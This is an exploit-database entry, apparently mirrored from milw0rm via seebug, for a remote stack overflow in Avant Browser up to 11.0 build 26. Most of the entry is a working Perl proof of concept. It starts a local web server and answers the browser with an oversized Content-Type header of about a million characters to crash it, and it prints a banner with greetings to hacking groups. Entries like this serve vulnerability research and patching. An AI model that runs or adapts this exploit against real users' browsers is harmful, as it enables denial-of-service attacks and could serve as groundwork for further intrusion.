Lucene search
K

Avant Browser <= 11.0 build 26 Remote Stack Overflow Crash Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

Avant Browser Remote Stack Overflow Cras

Code

                                                #!/usr/bin/perl
# Avant Browser (ALL Version) Remot Stack OverFlow (Crash)
# Discovered by DATA_SNIPER
# Usage:
# connect from Avant browser to http://127.0.0.1/
use IO::Socket;
my $sock=new IO::Socket::INET (
Listen    =&#62; 1,
                                
LocalAddr =&#62; &#39;localhost&#39;,
                                
LocalPort =&#62; 80,
                               
Proto     =&#62; &#39;tcp&#39;);
die unless $sock;
$huge=&#34;A&#34; x 1034985;
$|=1;
print &#34;==========================================================================\n&#34;;
print &#34;        Avant Browser (ALL Version) Remot Stack OverFlow (Crash)
&#34;;
print &#34;                 Vulnerability Discovered by DATA_SNIPER
&#34;;
print &#34;   GreetZ To:Hacking Master,Dear Devil,Xodia,JASS,All Algerian Hackers \n&#34;;
print &#34;               Mail me at:Alpha_3(at)hotmail(dot)com\n&#34;;
print &#34;==========================================================================\n&#34;;
print&#34;[+] Http server started on port  80... \n&#34;;
print&#34;[+] Try To Explorer http://127.0.0.1/ \n&#34;;
$z=$sock-&#62;accept();
print&#34;[+] Connection Accepted!\n&#34;;
do
{
 $ln=&#60;$z&#62;;
 
print $ln;
 chomp $ln;
 
 if (($ln eq &#34;&#34;)||($ln eq &#34;\n&#34;)||($ln eq &#34;\r&#34;))
 {
  
print&#34;[&#62;]Sending Evil Packet\n&#34;;
  
print $z &#34; HTTP/1.1 200 OK\r\nServer: bugs 3.1.02\r\nContent-Type:$huge\r\nConnection: close\r\n\r\n&#34;;
close($z);
  
exit;
 
}
} while (true);

# milw0rm.com [2007-03-18]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
10